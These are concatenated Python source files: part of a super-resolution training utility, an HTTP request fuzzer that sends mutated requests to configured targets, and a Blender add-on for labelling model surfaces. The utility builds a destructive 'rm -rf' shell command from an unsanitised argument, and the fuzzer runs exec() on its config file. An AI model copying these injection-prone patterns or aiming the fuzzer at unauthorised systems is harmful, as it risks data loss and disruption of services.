self.acc += self.toc()
def release(self):
ret = self.acc
self.acc = 0
return ret
def reset(self):
self.acc = 0
class checkpoint:
def __init__(self, args):
self.args = args
self.ok = True
self.log = torch.Tensor()
now = datetime.datetime.now().strftime("%Y-%m-%d-%H:%M:%S")
if not args.load:
if not args.save:
args.save = now
self.dir = os.path.join("..", "experiment", args.save)
else:
self.dir = os.path.join("..", "experiment", args.load)
if os.path.exists(self.dir):
self.log = torch.load(self.get_path("psnr_log.pt"))
print("Continue from epoch {}...".format(len(self.log)))
else:
args.load = ""
if args.reset:
os.system("rm -rf " + self.dir)
args.load = ""
os.makedirs(self.dir, exist_ok=True)
os.makedirs(self.get_path("model"), exist_ok=True)
for d in args.data_test:
os.makedirs(self.get_path("results-{}".format(d)), exist_ok=True)
open_type = "a" if os.path.exists(self.get_path("log.txt")) else "w"
self.log_file = open(self.get_path("log.txt"), open_type)
with open(self.get_path("config.txt"), open_type) as f:
f.write(now + "\n\n")
for arg in vars(args):
f.write("{}: {}\n".format(arg, getattr(args, arg)))
f.write("\n")
self.n_processes = 8
def get_path(self, *subdir):
return os.path.join(self.dir, *subdir)
def save(self, trainer, epoch, is_best=False):
trainer.model.save(self.get_path("model"), epoch, is_best=is_best)
trainer.loss.save(self.dir)
trainer.loss.plot_loss(self.dir, epoch)
self.plot_psnr(epoch)
trainer.optimizer.save(self.dir)
torch.save(self.log, self.get_path('psnr_log.pt'))
def add_log(self, log):
self.log = torch.cat([self.log, log])
def write_log(self, log, refresh=False):
print(log)
self.log_file.write(log + "\n")
if refresh:
self.log_file.close()
self.log_file = open(self.get_path("log.txt"), "a")
def done(self):
self.log_file.close()
def plot_psnr(self, epoch):
axis = np.linspace(1, epoch, epoch)
for idx_data, d in enumerate(self.args.data_test):
label = "SR on {}".format(d)
fig = plt.figure()
plt.title(label)
for idx_scale, scale in enumerate(self.args.scale):
plt.plot(
axis,
self.log[:, idx_data, idx_scale].numpy(),
label="Scale {}".format(scale),
)
plt.legend()
plt.xlabel("Epochs")
plt.ylabel("PSNR")
plt.grid(True)
plt.savefig(self.get_path("test_{}.pdf".format(d)))
plt.close(fig)
def begin_background(self):
self.queue = Queue()
def bg_target(queue):
while True:
if not queue.empty():
filename, tensor = queue.get()
if filename is None:
break
imageio.imwrite(filename, tensor.numpy())
self.process = [
Process(target=bg_target, args=(self.queue,))
for _ in range(self.n_processes)
]
for p in self.process:
p.start()
def end_background(self):
for _ in range(self.n_processes):
self.queue.put((None, None))
while not self.queue.empty():
time.sleep(1)
for p in self.process:
p.join()
def save_results(self, dataset, filename, save_list, scale):
if self.args.save_results:
filename = self.get_path(
"results-{}".format(dataset.dataset.name),
"{}_x{}_".format(filename, scale),
)
postfix = ("SR", "LR", "HR")
for v, p in zip(save_list, postfix):
normalized = v[0].mul(255 / self.args.rgb_range)
tensor_cpu = normalized.byte().permute(1, 2, 0).cpu()
self.queue.put(("{}{}.png".format(filename, p), tensor_cpu))
def quantize(img, rgb_range):
pixel_range = 255 / rgb_range
return img.mul(pixel_range).clamp(0, 255).round().div(pixel_range)
def calc_psnr(sr, hr, scale, rgb_range, dataset=None):
if hr.nelement() == 1:
return 0
diff = (sr - hr) / rgb_range
if dataset and dataset.dataset.benchmark:
shave = scale
if diff.size(1) > 1:
gray_coeffs = [65.738, 129.057, 25.064]
convert = diff.new_tensor(gray_coeffs).view(1, 3, 1, 1) / 256
diff = diff.mul(convert).sum(dim=1)
else:
shave = scale + 6
valid = diff[..., shave:-shave, shave:-shave]
mse = valid.pow(2).mean()
return -10 * math.log10(mse)
def make_optimizer(args, target):
'''
make optimizer and scheduler together
'''
# optimizer
trainable = filter(lambda x: x.requires_grad, target.parameters())
kwargs_optimizer = {'lr': args.lr, 'weight_decay': args.weight_decay}
if args.optimizer == 'SGD':
optimizer_class = optim.SGD
kwargs_optimizer['momentum'] = args.momentum
elif args.optimizer == 'ADAM':
optimizer_class = optim.Adam
kwargs_optimizer['betas'] = args.betas
kwargs_optimizer['eps'] = args.epsilon
elif args.optimizer == 'RMSprop':
optimizer_class = optim.RMSprop
kwargs_optimizer['eps'] = args.epsilon
# scheduler
milestones = list(map(lambda x: int(x), args.decay.split('-')))
kwargs_scheduler = {'milestones': milestones, 'gamma': args.gamma}
scheduler_class = lrs.MultiStepLR
class CustomOptimizer(optimizer_class):
def __init__(self, *args, **kwargs):
super(CustomOptimizer, self).__init__(*args, **kwargs)
def _register_scheduler(self, scheduler_class, **kwargs):
self.scheduler = scheduler_class(self, **kwargs)
def save(self, save_dir):
torch.save(self.state_dict(), self.get_dir(save_dir))
def load(self, load_dir, epoch=1):
self.load_state_dict(torch.load(self.get_dir(load_dir)))
if epoch > 1:
for _ in range(epoch): self.scheduler.step()
def get_dir(self, dir_path):
return os.path.join(dir_path, 'optimizer.pt')
def schedule(self):
self.scheduler.step()
def get_lr(self):
return self.scheduler.get_lr()[0]
def get_last_epoch(self):
return self.scheduler.last_epoch
optimizer = CustomOptimizer(trainable, **kwargs_optimizer)
optimizer._register_scheduler(scheduler_class, **kwargs_scheduler)
return optimizer
|
main.py
|
import random
import re
import copy
import socket
import threading
from multiprocessing import Process, Queue
import time
from input_tree_node import Node
from input_tree import InputTree
from input_tree_mutator import Mutator
from helper_functions import _print_exception, _parse_args
class Fuzzer:
def __init__(self, verbose, seed, outfilename, seedfile):
self.read_config(args.config)
self.verbose = verbose
self.seed = seed
self.lock = threading.Lock()
self.outfilename = outfilename
self.seedfile = seedfile
def read_config(self, configfile):
config_content = open(configfile).read().replace('config.', 'self.')
exec(config_content)
if False in [item in self.__dict__ for item in ["target_urls", "target_host_headers", "grammar", "min_num_mutations", "max_num_mutations", "symbol_mutation_types"]]:
print("Please make sure that the configuration is complete.")
exit()
self.target_hosts = {self.target_urls[i]:self.target_host_headers[i] for i in range(len(self.target_urls))}
def send_fuzzy_data(self, inputdata, list_responses):
try:
request = inputdata.tree_to_request()
_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_socket.connect((inputdata.host, int(inputdata.port)))
_socket.sendall(request)
_socket.settimeout(4)
response = b''
while True:
data = _socket.recv(2048)
if not data:
break
else:
response += data
_socket.shutdown(socket.SHUT_RDWR)
_socket.close()
with self.lock:
list_responses.append(response)
except socket.timeout:
with self.lock:
list_responses.append(b"takes too long")
except Exception as exception:
_print_exception([request])
raise exception
def get_responses(self, seed, request):
threads = []
list_responses = []
for target_url in self.target_urls:
request.seed = seed
request.url = target_url
request.host_header = self.target_hosts[target_url]
request_copy = copy.deepcopy(request)
thread = threading.Thread(target=self.send_fuzzy_data, args=(request_copy, list_responses))
threads.append(thread)
thread.start()
for thread in threads:
thread.join(5)
return list_responses
def blackbox_fuzz_parallel_batch(self):
for j in range(1): # number of batches
num_procs = 64
batch_size = 1000
seeds_splitted = [[j*batch_size + i for i in list(range(i, batch_size, num_procs))] for i in range(num_procs)]
quot = Queue()
processes = [Process(target=self.run, args=(seeds_splitted[i], quot)) for i in range(num_procs)]
responses_list = []
for i, proc in enumerate(processes):
proc.start()
result = [quot.get() for p in processes]
for i, proc in enumerate(processes):
proc.join()
responses_list = [ent for sublist in result for ent in sublist]
with open("batch{}.out".format(j), 'w') as outfile:
outfile.write("\n".join(responses_list))
outfile.write("\n")
def blackbox_fuzz_individual(self, filename=None, seeds=[None]):
if seeds == [None]:
with open(filename, 'r') as _file:
seeds = [int(line.strip()) for line in _file.readlines()]
num_procs = 64
seeds_splitted = [[seeds[i] for i in list(range(i, len(seeds), num_procs))] for i in range(num_procs)]
quot = Queue()
processes = [Process(target=self.run_individual, args=(seeds_splitted[i], quot)) for i in range(num_procs)]
responses_list = []
for i, proc in enumerate(processes):
proc.start()
result = [quot.get() for p in processes]
for i, proc in enumerate(processes):
proc.join()
responses_list = [ent for sublist in result for ent in sublist]
if self.outfilename is None:
print("\n".join(responses_list))
print("\n")
else:
with open(self.outfilename, 'w') as outfile:
outfile.write("\n".join(responses_list))
outfile.write("\n")
def run(self, seeds, _queue):
responses_list = []
for seed in seeds:
base_input = InputTree(self.grammar, seed, "http://hostname/uri", False)
base_input.build_tree(base_input.root)
mutator = Mutator(self.symbol_mutation_types, self.char_pool, base_input, seed, self.min_num_mutations, self.max_num_mutations, self.verbose)
mutator.mutate_input()
responses = self.get_responses(seed, base_input)
responses_list.append("{} ***** {} ***** {} ***** {}".format(seed, base_input.tree_to_request(), responses, mutator.mutation_messages))
_queue.put(responses_list)
def run_individual(self, seeds, _queue):
responses_list = []
for seed in seeds:
base_input = InputTree(self.grammar, seed, "http://hostname/uri", False)
base_input.build_tree(base_input.root)
mutator = Mutator(self.symbol_mutation_types, self.char_pool, base_input, seed, self.min_num_mutations, self.max_num_mutations, self.verbose)
mutator.mutate_input()
responses = self.get_responses(seed, base_input)
responses_list.append("{} ***** {} ***** {} ***** {}".format(seed, base_input.tree_to_request(), responses, mutator.mutation_messages))
_queue.put(responses_list)
args = _parse_args()
start = time.time()
fuzzer = Fuzzer(args.verbose, args.seed, args.outfilename, args.seedfile)
if args.individual_mode:
fuzzer.blackbox_fuzz_individual(fuzzer.seedfile, [fuzzer.seed])
else:
fuzzer.blackbox_fuzz_parallel_batch()
print(time.time() - start)
|
magicaddon.py
|
import bpy
from bpy.props import *
import bmesh
import pickle
import math
import mathutils
import json
import requests
from collections import OrderedDict
from scipy.spatial import distance
import threading
import time
import gzip, zlib
import numpy as np
from io import BytesIO
###############################################################################################
#### We define the addon information in this structure: #########################
#### name,author,version,blender support,location in blender UI, #########################
#### description,category,etc. #########################
###############################################################################################
bl_info = \
{
"name" : "Magic Maker",
"author" : "Lei Shi <ls776@cornell.edu>, Ricardo Gonzalez <re.gonzalez10@uniandes.edu.co>",
"version" : (2, 0, 1),
"blender" : (2, 7, 9),
"location" : "View 3D > Magic Tools-Maker",
"description" :"This tool is used to design models for Talkit++, by labelling surfaces in the model",
"warning" : "",
"wiki_url" : "",
"tracker_url" : "",
"category" : "Development",
}
def download_file(url):
local_filename = url.split('/')[-1]
# NOTE the stream=True parameter below
with requests.get(url, stream=True) as r:
r.raise_for_status()
with open(local_filename, 'wb') as f:
for chunk in r.iter_content(chunk_size=8192):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
# f.flush()
return local_filename
def writeFile(fileName,data):
with open(fileName + ".json", 'w', encoding='utf-8') as f:
json.dump(data, f, ensure_ascii=False, indent=4)
def writeFilePickle(fileName,newdata):
pickle.dump(newdata, open(fileName, "wb"),
protocol=2)
#get transformation matrix from the Blender coordinates to the Tracker coordinates
def solve_affine( p1, p2, p3, p4, s1, s2, s3, s4 ):
x = np.transpose(np.matrix([p1,p2,p3,p4]))
y = np.transpose(np.matrix([s1,s2,s3,s4]))
x = np.vstack((x,[1,1,1,1]))
y = np.vstack((y,[1,1,1,1]))
mtx = y * x.I
# return function that takes input x and transforms it
# don't need to return the 4th row as it is
return mtx
#enter a point X in Blender coordinates, and transformation matrix to get its Tracker coordinates
def solve_point(x, trans):
result= (trans*np.vstack((np.matrix(x).reshape(3,1),1)))[0:3,:].tolist()
return [result[0][0],result[1][0],result[2][0]]
#enter a normal X in Blender coordinates, and transformation matrix to get its Tracker coordinates
def solve_normal(x, trans):
result= (trans*np.vstack((np.matrix(x).reshape(3,1),0)))[0:3,:].tolist()
return [result[0][0],result[1][0],result[2][0]]
#for initialize the transformation matrix
#calculate the euclidean distance between pt1 and pt2
def calDistance(pt1,pt2):
return distance.euclidean(pt1,pt2)
#for initialize the transformation matrix
#scale a list with a value (scale)
def calScaledList(scale,list):
return [x * scale for x in list]
def faceptsCompare(faceA,faceB):
for ptA in faceA:
for ptB in faceB:
if ptA == ptB:
return True
return False
#blenderFace object
#store information for a face
class blenderFace:
def __init__(self, rawFace, mtx):
#for marked face, it has more information
#with the len == 4
if len(rawFace)==4:
#makred face
self.marked=True
self.blender_index = rawFace[0][0]
self.area_id = rawFace[0][4]
self.label = rawFace[0][1]
self.content = rawFace[0][2]
self.gesture = rawFace[0][3]
self.blender_color = [x * 255 for x in rawFace[1]]
self.normal = rawFace[3]
self.verts = rawFace[2]
self.vertsConverted = []
self.vertsConverted_2d = []
self.relatedFaces = []
for eachPt in self.verts:
self.vertsConverted.append(solve_point(eachPt, mtx))
self.normalConverted= solve_normal(self.normal, mtx)
else:
#unmarked face
self.marked = False
self.verts = rawFace[0]
self.normal = rawFace[1]
self.blender_index = rawFace[2]
self.label = "unmarked"
self.content = "null"
self.gesture = "null"
self.vertsConverted = []
self.vertsConverted_2d = []
self.relatedFaces = []
for eachPt in self.verts:
self.vertsConverted.append(solve_point(eachPt, mtx))
self.normalConverted = solve_normal(self.normal, mtx)
#blenderPoint object
#store information for a point
class blenderPoint:
def __init__(self, coordinates, faceIndex, mtx):
self.vert = coordinates[:]
self.faceIndex = [faceIndex]
self.vertsConverted = solve_point(self.vert, mtx)
def addFace(self, faceIndex):
self.faceIndex.append(faceIndex)
#read blender pickle file and save them as blenderFace or blenderPoint
class blenderReader:
#initialize the reader with the pickle file address
def __init__(self,fileAddress):
import datetime
currentDT = datetime.datetime.now()
print ("load file" + str(currentDT))
file = open(fileAddress, "rb")
#blenderData is encoded as [(xy,yz),(marked face),(unmarked face), (name, introduction)]
self.data = pickle.load(file)
self.blenderData = self.data[0]
file.close()
print ("finish loading" + str(datetime.datetime.now()))
#variables for finding the transformation matrix
self.vertsXZ = self.blenderData[0][0][:]
self.vertsYZ = self.blenderData[0][1][:]
self.generalInfo = self.blenderData[3]
#print self.generalInfo
#self.unitSize = 14.0/30.0
self.unitSize = 14.0 / 30.0
print ("start tranformation matrix" + str(datetime.datetime.now()))
self.transMtx = self.initialTrans() #no need to check this one
print ("start marked faces" + str(datetime.datetime.now()))
self.markedFaces = self.initialMarked()
print ("start unmarked faces" + str(datetime.datetime.now()))
self.unmarkedFaces = self.initialUnmarked()
self.allFaces = self.markedFaces[:]+self.unmarkedFaces[:]
print ("start related faces" + str(datetime.datetime.now()))
self.findrelatedFaces()
print ("finish related faces"+ str(datetime.datetime.now()))
#self.allPoints = self.getAllpoints()
def initialTrans(self):
#identify four key points from the data
#find the unique one (A) in xz face
for vertXZ in self.vertsXZ:
if vertXZ not in self.vertsYZ:
self.A=vertXZ[:]
#find the unique one (D) in yz face
for vertYZ in self.vertsYZ:
if vertYZ not in self.vertsXZ:
self.D=vertYZ[:]
#find the B and C point
TempResult=[]
for element in self.vertsXZ:
if element in self.vertsYZ:
TempResult.append(element)
dis1=calDistance(TempResult[0],self.A)
dis2=calDistance(TempResult[1],self.A)
if dis1 > dis2:
self.B=TempResult[1][:]
self.C=TempResult[0][:]
else:
self.C=TempResult[1][:]
self.B=TempResult[0][:]
#print self.A, self.B, self.C, self.D
#find the real coordinates of these points
self.ptC=calScaledList(self.unitSize,[-5.04229,0,-8.4463])
self.ptB=calScaledList(self.unitSize,[-5.04229,0,-8.4463+2.04945])
self.ptA=calScaledList(self.unitSize,[-5.04229+4.03073,0,-8.4463+2.04945])
self.ptD=calScaledList(self.unitSize,[-5.04229,4.98983,-8.4463])
mtx = solve_affine(self.A, self.B, self.C, self.D, self.ptA, self.ptB, self.ptC, self.ptD)
return mtx
def initialMarked(self):
markedFaces=[]
#Marked face, self.blenderData[1], is encoded as:
#[[(blender_index, label, content, gesture), blender_color, verts, normal]...]
for face in self.blenderData[1]:
markedFaces.append(blenderFace(face, self.transMtx))
return markedFaces
def initialUnmarked(self):
unmarkedFaces=[]
#Marked face, self.blenderData[1], is encoded as:
#[[faceVerts, faceNormal]...]
for face in self.blenderData[2]:
if len(face[0]) == 3:
unmarkedFaces.append(blenderFace(face, self.transMtx))
return unmarkedFaces
def findrelatedFaces(self):
faceMap = self.data[1]
pointMap = self.data[2]
relatedFaces = {}
oldIdxToNewIdx = {}
for face in faceMap:
if face not in relatedFaces:
relatedFaces[face] = set()
for point in faceMap.get(face):
for fIndex in pointMap.get(point):
relatedFaces.get(face).add(fIndex)
for faceIdx in range(len(self.allFaces)):
oldIdxToNewIdx[self.allFaces[faceIdx].blender_index] = faceIdx
for faceIdx in range(len(self.allFaces)):
faceOldIndex = self.allFaces[faceIdx].blender_index
tempSet = relatedFaces.get(str(faceOldIndex))
for faceR in tempSet:
self.allFaces[faceIdx].relatedFaces.append(oldIdxToNewIdx[faceR])
class cls_AreaData(bpy.types.PropertyGroup):
bl_options = {'REGISTER', 'UNDO'}
# The properties for this class which is referenced as an 'entry' below.
area_index = bpy.props.IntProperty(name="Index", description="index for designated faces", default=0)
area_label = bpy.props.StringProperty(name="Label", description="Label", default="")
area_content = bpy.props.StringProperty(name="Content", description="Content", default="")
area_gesture = bpy.props.StringProperty(name="Gesture", description="Gesture", default="")
area_color = bpy.props.FloatVectorProperty(
name="Color",
subtype="COLOR",
size=4,
min=0.0,
max=1.0,
default=(1.0, 1.0, 1.0, 1.0)
)
###############################################################################################
#### This class is used to debug errors and #########################
#### inform the user about mistakes. #########################
#### Pops up a dialog window with the given message #########################
###############################################################################################
class MessageOperator(bpy.types.Operator):
bl_idname = "error.message"
bl_label = "Message"
### Properties set when the error dialog is invoked
### type: Type of error
### message: Content of the error dialog
type = StringProperty()
message = StringProperty()
def execute(self, context):
self.report({'INFO'}, self.message)
print(self.message)
return {'FINISHED'}
def invoke(self, context, event):
wm = context.window_manager
### Set dialog window size and invoking
return wm.invoke_popup(self, width=800, height=400)
def draw(self, context):
### Defining the structure of the window dialog
self.layout.label("ERROR! Check the message for more info")
row = self.layout.split(0.25)
row.prop(self, "type")
row.prop(self, "message")
row = self.layout.split(0.80)
row.label("")
### Adding ok button to close the window
row.operator("error.ok")
###############################################################################################
#### #########################
#### The OK button used in the error dialog #########################
#### #########################
###############################################################################################
class OkOperator(bpy.types.Operator):
bl_idname = "error.ok"
bl_label = "OK"
def execute(self, context):
return {'FINISHED'}
###############################################################################################
#### Make material function #########################
#### This function creates the material that will be used to label##########################
#### the model #########################
###############################################################################################
def makeMaterial(name, diffuse, alpha, specular=(1, 1, 1)):
mat = bpy.data.materials.new(name)
mat.diffuse_color = diffuse
mat.diffuse_shader = 'LAMBERT'
mat.diffuse_intensity = 1.0
mat.specular_color = specular
mat.specular_shader = 'COOKTORR'
mat.specular_intensity = 0.5
mat.alpha = alpha
mat.ambient = 1
return mat
def mergeObjects(self,context):
obs = []
scenario = context.scene
for ob in scenario.objects:
# whatever objects you want to join...
if ob.type == 'MESH':
obs.append(ob)
ctx = bpy.context.copy()
# one of the objects to join
ctx['active_object'] = obs[1]
ctx['selected_objects'] = obs
# we need the scene bases as well for joining
ctx['selected_editable_bases'] = [scenario.object_bases[ob.name] for ob in obs]
bpy.ops.object.join(ctx)
ob = bpy.context.active_object
label = context.scene.inputLabel_hotarea
color = context.scene.inputColor_hotarea[:]
content = context.scene.inputContent_hotarea
gesture = context.scene.inputGesture_hotarea
i=0
for i in range(3):
ob.area_list.add()
ob.area_list[-1].area_index = len(ob.area_list) -1
ob.area_list[-1].area_label = "Scaffold"
ob.area_list[-1].area_content = "This is the scaffold of the model"
ob.area_list[-1].area_gesture = "nothing"
ob.area_list[-1].area_color = [0,0,0,0]
i+=1
return {"FINISHED"}
###############################################################################################
#### Add Scaffold function #######################
#### This function creates and adds the tracker scaffold to the scene#######################
#### #######################
###############################################################################################
def makeScaffold(self,context):
### Define Scaffold 82 Vertices
Vertices = \
[
mathutils.Vector((-29.99028968811035, -6.8105974197387695, -9.081909229280427e-05)),
mathutils.Vector((-29.99028968811035, -6.8105974197387695, 8.446209907531738)),
mathutils.Vector((-29.99028968811035, 10.22175121307373, 8.446209907531738)),
mathutils.Vector((-29.99028968811035, 10.22175121307373, -9.081909229280427e-05)),
mathutils.Vector((-19.942604064941406, -6.8105974197387695, 8.446209907531738)),
mathutils.Vector((-19.942604064941406, 10.22175121307373, 8.446209907531738)),
mathutils.Vector((-19.942604064941406, -6.8105974197387695, -9.081909229280427e-05)),
mathutils.Vector((-19.942604064941406, 10.22175121307373, -9.081909229280427e-05)),
mathutils.Vector((-25.95956802368164, 35.02724838256836, 4.396630764007568)),
mathutils.Vector((-27.95969009399414, 35.02724838256836, 2.3965096473693848)),
mathutils.Vector((-27.95969009399414, 35.02724838256836, 4.396630764007568)),
mathutils.Vector((-21.946422576904297, 35.02724838256836, 2.3965096473693848)),
mathutils.Vector((-23.894927978515625, 35.02724838256836, 4.396630764007568)),
mathutils.Vector((-21.946422576904297, 35.02724838256836, 4.396630764007568)),
mathutils.Vector((-25.95956802368164, 35.02724838256836, 6.396751880645752)),
mathutils.Vector((-23.894927978515625, 35.02724838256836, 6.396751880645752)),
mathutils.Vector((-29.99028968811035, 35.02724838256836, 8.446209907531738)),
mathutils.Vector((-29.99028968811035, 35.02724838256836, 6.396751880645752)),
mathutils.Vector((-24.948001861572266, 35.02724838256836, 8.446209907531738)),
mathutils.Vector((-19.90571403503418, 35.02724838256836, 8.446209907531738)),
mathutils.Vector((-19.90571403503418, 35.02724838256836, 6.396751880645752)),
mathutils.Vector((-29.99028968811035, 15.067978858947754, 8.446209907531738)),
mathutils.Vector((-29.99028968811035, 10.078160285949707, 8.446209907531738)),
mathutils.Vector((-24.948001861572266, 10.078160285949707, 8.446209907531738)),
mathutils.Vector((-29.99028968811035, 20.057796478271484, 8.446209907531738)),
mathutils.Vector((-29.99028968811035, 25.04761505126953, 8.446209907531738)),
mathutils.Vector((-29.99028968811035, 30.037431716918945, 8.446209907531738)),
mathutils.Vector((-19.90571403503418, 15.067978858947754, 8.446209907531738)),
mathutils.Vector((-19.90571403503418, 20.057796478271484, 8.446209907531738)),
mathutils.Vector((-19.90571403503418, 25.04761505126953, 8.446209907531738)),
mathutils.Vector((-19.90571403503418, 30.037431716918945, 8.446209907531738)),
mathutils.Vector((-19.90571403503418, 10.078160285949707, 8.446209907531738)),
mathutils.Vector((-19.90571403503418, 15.067978858947754, 6.396751880645752)),
mathutils.Vector((-19.90571403503418, 10.078160285949707, 6.396751880645752)),
mathutils.Vector((-23.894927978515625, 10.078160285949707, 6.396751880645752)),
mathutils.Vector((-23.894927978515625, 15.067978858947754, 6.396751880645752)),
mathutils.Vector((-19.90571403503418, 20.057796478271484, 6.396751880645752)),
mathutils.Vector((-23.894927978515625, 20.057796478271484, 6.396751880645752)),
mathutils.Vector((-19.90571403503418, 30.037431716918945, 6.396751880645752)),
mathutils.Vector((-19.90571403503418, 25.04761505126953, 6.396751880645752)),
mathutils.Vector((-23.894927978515625, 25.04761505126953, 6.396751880645752)),
mathutils.Vector((-23.894927978515625, 30.037431716918945, 6.396751880645752)),
mathutils.Vector((-29.99028968811035, 15.067978858947754, 6.396751880645752)),
mathutils.Vector((-29.99028968811035, 10.078160285949707, 6.396751880645752)),
mathutils.Vector((-29.99028968811035, 20.057796478271484, 6.396751880645752)),
mathutils.Vector((-29.99028968811035, 30.037431716918945, 6.396751880645752)),
mathutils.Vector((-29.99028968811035, 25.04761505126953, 6.396751880645752)),
mathutils.Vector((-25.95956802368164, 15.067978858947754, 6.396751880645752)),
mathutils.Vector((-25.95956802368164, 10.078160285949707, 6.396751880645752)),
mathutils.Vector((-25.95956802368164, 20.057796478271484, 6.396751880645752)),
mathutils.Vector((-25.95956802368164, 30.037431716918945, 6.396751880645752)),
mathutils.Vector((-25.95956802368164, 25.04761505126953, 6.396751880645752)),
mathutils.Vector((-25.95956802368164, 15.067978858947754, 4.396630764007568)),
mathutils.Vector((-25.95956802368164, 10.078160285949707, 4.396630764007568)),
mathutils.Vector((-25.95956802368164, 20.057796478271484, 4.396630764007568)),
mathutils.Vector((-25.95956802368164, 30.037431716918945, 4.396630764007568)),
mathutils.Vector((-25.95956802368164, 25.04761505126953, 4.396630764007568)),
mathutils.Vector((-27.95969009399414, 15.067978858947754, 4.396630764007568)),
mathutils.Vector((-27.95969009399414, 10.078160285949707, 4.396630764007568)),
mathutils.Vector((-27.95969009399414, 20.057796478271484, 4.396630764007568)),
mathutils.Vector((-27.95969009399414, 30.037431716918945, 4.396630764007568)),
mathutils.Vector((-27.95969009399414, 25.04761505126953, 4.396630764007568)),
mathutils.Vector((-27.95969009399414, 15.067978858947754, 2.3965096473693848)),
mathutils.Vector((-27.95969009399414, 10.078160285949707, 2.3965096473693848)),
mathutils.Vector((-27.95969009399414, 20.057796478271484, 2.3965096473693848)),
mathutils.Vector((-27.95969009399414, 30.037431716918945, 2.3965096473693848)),
mathutils.Vector((-27.95969009399414, 25.04761505126953, 2.3965096473693848)),
mathutils.Vector((-21.946422576904297, 15.067978858947754, 2.3965096473693848)),
mathutils.Vector((-21.946422576904297, 10.078160285949707, 2.3965096473693848)),
mathutils.Vector((-21.946422576904297, 20.057796478271484, 2.3965096473693848)),
mathutils.Vector((-21.946422576904297, 30.037431716918945, 2.3965096473693848)),
mathutils.Vector((-21.946422576904297, 25.04761505126953, 2.3965096473693848)),
mathutils.Vector((-21.946422576904297, 15.067978858947754, 4.396630764007568)),
mathutils.Vector((-21.946422576904297, 10.078160285949707, 4.396630764007568)),
mathutils.Vector((-21.946422576904297, 20.057796478271484, 4.396630764007568)),
mathutils.Vector((-21.946422576904297, 30.037431716918945, 4.396630764007568)),
mathutils.Vector((-21.946422576904297, 25.04761505126953, 4.396630764007568)),
mathutils.Vector((-23.894927978515625, 15.067978858947754, 4.396630764007568)),
mathutils.Vector((-23.894927978515625, 10.078160285949707, 4.396630764007568)),
mathutils.Vector((-23.894927978515625, 20.057796478271484, 4.396630764007568)),
mathutils.Vector((-23.894927978515625, 30.037431716918945, 4.396630764007568)),
mathutils.Vector((-23.894927978515625, 25.04761505126953, 4.396630764007568))
]
### Define the mesh we are adding as "Scaffold"
### If there is already an item called "Scaffold", it will
### automatically add the mesh with the name "Scaffold.001"
NewMesh = bpy.data.meshes.new("Scaffold")
### We define how the mesh will be built
### First we send the Vertices (Defined previously)
### Then we send the faces that will compose the Scaffold
### (156 triangular faces), Each face is built by using
### 3 of the vertices in the list of vertices given.
NewMesh.from_pydata \
(
Vertices,
[],
[[23,48,43],[0, 1, 2], [0, 2, 3], [1, 4, 5], [1, 5, 2], [4,6,7], [4,7,5], [6,0,3], [6,3,7], [1,0,6], [6,4,1], [2,7,3], [7,2,5], [8,9,10], [11,9,8], [11,8,12], [13,11,12], [12,8,14], [12,14,15], [18,14,16], [19,20,15], [15,18,19], [18,15,14], [21,22,23], [24,21,23], [24,18,25], [26,18,16], [18,26,25], [24,23,18], [27,28,23], [18,23,28], [18,28,29], [30,18,29], [18,30,19], [31,27,23], [32,33,34], [32,34,35], [36,32,35], [36,35,37], [38,39,40], [38,40,41], [20,38,41], [20,41,15], [39,36,37], [39,37,40], [42,43,22], [21,44,42],[42,22,21], [44,21,24], [45,46,25], [45,25,26], [17,45,26], [46,44,24], [46,24,25], [27,31,33], [27,33,32], [28,27,32], [28,32,36], [30,29,39], [30,39,38], [19,30,38], [19,38,20], [29,28,36], [29,36,39], [47,48,43], [47,43,42], [49,47,42], [49,42,44], [50,51,46], [50,46,45], [14,50,45], [14,45,17], [51,49,44], [51,44,46], [52,53,48], [52,48,47], [54,52,47], [54,47,49], [55,56,51], [55,51,50], [8,55,50], [8,50,14], [56,54,49], [56,49,51], [57,58,53], [57,53,52], [59,57,52], [59,52,54], [60,61,56], [60,56,55], [10,60,55], [10,55,8], [61,59,54], [61,54,56], [62,63,58], [62,58,57], [64,62,57], [64,57,59], [65,66,61], [65,61,60], [9,65,60], [9,60,10], [66,64,59], [66,59,61], [67,68,63], [67,63,62], [69,67,62], [69,62,64], [70,71,66], [70,66,65], [11,70,65], [11,65,9], [71,69,64], [71,64,66], [72,73,68], [72,68,67], [74,72,67], [74,67,69], [75,76,71], [75,71,70], [13,75,70], [13,70,11], [76,74,69], [76,69,71], [77,78,73], [77,73,72], [79,77,72], [79,72,74], [80,81,76], [80,76,75], [12,80,75], [12,75,13], [81,74,76], [35,34,78], [35,78,77], [37,35,77], [37,77,79], [41,40,81], [81,74,79],[41,81,80], [15,41,80], [15,80,12], [40,37,79], [40,79,81], [58,63,53], [63,68,78], [63,78,53], [43,23,22], [48,53,78], [48,78,34], [73,78,68], [31,23,34], [34,23,48], [34,33,31],[16,14,17],[16,26,17]]
)
NewMesh.update()
NewObj = bpy.data.objects.new("Scaffold", NewMesh)
### linking the new object to the scene
context.scene.objects.link(NewObj)
### We select the object to add xzFace and yzFace materials
context.scene.objects.active = NewObj
ob = bpy.context.object
current_mode = bpy.context.object.mode
### Check in which mode we are to handle errors
if current_mode != 'EDIT' :
bpy.ops.object.editmode_toggle()
# If the material already exists, don't creat a new one
matxz = bpy.data.materials.get("xzFace")
matyz = bpy.data.materials.get("yzFace")
main = bpy.data.materials.new("mainBody")
if matxz is None:
# create material if it doesn't exist
matxz = bpy.data.materials.new(name="xzFace")
matyz = bpy.data.materials.new(name="yzFace")
main = bpy.data.materials.new(name="mainBody")
### Add each of the 3 materials that compose the scaffold
### and give them color
ob.data.materials.append(main)
### White for the mainbody
bpy.data.materials['mainBody'].diffuse_color = (1,1,1)
### Red for the xz plane face
ob.data.materials.append(matxz)
bpy.data.materials['xzFace'].diffuse_color = (1,0,0)
### Blue for the yz plane face
ob.data.materials.append(matyz)
bpy.data.materials['yzFace'].diffuse_color = (0,0,1)
mesh = ob.data
if bpy.context.object.mode != 'EDIT' :
bpy.ops.object.mode_set(mode='EDIT')
bpy.ops.mesh.remove_doubles(threshold=0.0001)
bm = bmesh.from_edit_mesh(mesh)
if hasattr(bm.faces, "ensure_lookup_table"):
bm.faces.ensure_lookup_table()
### We add the materials xzFace and yzFace to 2 specific faces in
### the scaffold to have a point of reference.
bm.faces[155].material_index = 2
bm.faces[154].material_index = 1
bpy.ops.mesh.select_all(action='SELECT')
bpy.ops.mesh.normals_make_consistent(inside=False)
bpy.ops.object.editmode_toggle()
